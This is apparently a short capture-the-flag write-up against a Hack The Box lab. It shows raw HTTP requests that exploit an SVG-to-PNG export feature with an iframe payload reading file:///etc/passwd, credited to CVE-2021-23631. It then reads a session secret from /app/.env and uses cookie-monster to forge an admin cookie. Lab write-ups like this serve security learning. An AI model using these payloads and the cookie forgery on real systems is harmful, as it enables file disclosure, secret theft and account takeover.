Got a way to display file via svg to png LFI CVE-2021-23631:
POST /api/export HTTP/1.1
Host: 138.68.175.87:30484
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: <http://138.68.175.87:30484/dashboard>
Content-Type: application/json
Origin: <http://138.68.175.87:30484>
Content-Length: 283
DNT: 1
Connection: close
Cookie: session.sig=4u6WkhlFO5u5hCXaxOP-HGYLD9s; session=eyJ1c2VybmFtZSI6InRlc3QyIn0=
{"svg":"`<svg-dummy></svg-dummy><iframe src=\\"file:///etc/passwd\\" width=\\"100%\\" height=\\"1000px\\"></iframe><svg viewBox=\\"0 0 240 80\\" height=\\"1000\\" width=\\"1000\\" xmlns=\\"<http://www.w3.org/2000/svg\\>"><text x=\\"0\\" y=\\"0\\" class=\\"Rrrrr\\" id=\\"demo\\">data</text></svg>`"}
Got the secret to sign/verify cookie in /app/.env
SESSION_SECRET_KEY=5921719c3037662e94250307ec5ed1db
Used cookie-monster to generate the cookie:
root@sd-127123:/tmp# cat test.json
{"username":"admin"}
root@sd-127123:/tmp# cookie-monster -e -f test.json -k 5921719c3037662e94250307ec5ed1db
_ _
_/0\\/ \\_
.-. .-` \\_/\\0/ '-.
/:::\\ / ,_________, \\
/\\:::/ \\ '. (:::/ `'-;
\\ `-'`\\ '._ `"'"'\\__ \\
`'-. \\ `)-=-=( `, |
\\ `-"` `"-` /
[+] Data Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0=
[+] Signature Cookie: session.sig=EYdvy2mhVoEznETyhYjNYFFZM8o
Burp repaeter:
GET /dashboard HTTP/1.1
Host: 138.68.150.120:31876
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: <http://138.68.150.120:31876/>
DNT: 1
Connection: close
Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0=; session.sig=EYdvy2mhVoEznETyhYjNYFFZM8o
Upgrade-Insecure-Requests: 1
The flag is in the source code response:
var flag = 'HTB{ZZZZZZZZZZZZZZZZZZZZZZ}'